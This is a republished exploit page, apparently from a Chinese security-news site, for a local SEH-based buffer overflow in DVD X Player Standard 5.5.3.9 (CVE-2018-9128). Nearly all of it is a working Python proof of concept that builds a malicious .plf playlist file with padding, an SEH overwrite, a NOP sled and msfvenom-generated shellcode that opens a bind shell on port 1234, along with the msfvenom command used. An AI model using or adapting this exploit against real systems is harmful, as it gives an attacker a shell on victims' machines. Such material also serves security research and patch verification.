DVD X Player Standard 5.5.3.9 - Buffer Overflow
|
来源:http://hack2rule.wordpress.com/ 作者:Paul 发布时间:2018-04-11
|
|
###################################################### # Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9 # Date: 29.03.2018 # Vendor Homepage: http://www.dvd-x-player.com # Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup- # Standard.exe # Category: Local (SEH Based) # Exploit Credit: Prasenjit Kanti Paul # Web: http://hack2rule.wordpress.com/ # Version: 5.5.3.9 # Tested on: Windows XP SP3 x86 # CVE: CVE-2018-9128 ###################################################### # root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python # No platform was selected, choosing Msf::Module::Platform::Windows from the payload # No Arch selected, selecting Arch: x86 from the payload # x86/shikata_ga_nai chosen with final size 355 # Payload size: 355 bytes # Final size of python file: 1710 bytes file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w") buffer = "\x41" * 608 next_seh = "\xeb\x06\x90\x90" seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll nops = "\x90" * 100 buf = "" buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31" buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a" buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a" buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8" buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3" buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9" buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21" buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98" buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1" buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05" buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65" buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40" buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5" buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb" buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a" buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20" buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f" buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d" buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05" buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f" buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78" buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07" buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8" buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5" buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e" buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49" buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7" buf += "\xbe\xde\x84\xf2" file.write(buffer + next_seh + seh + nops + buf) file.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|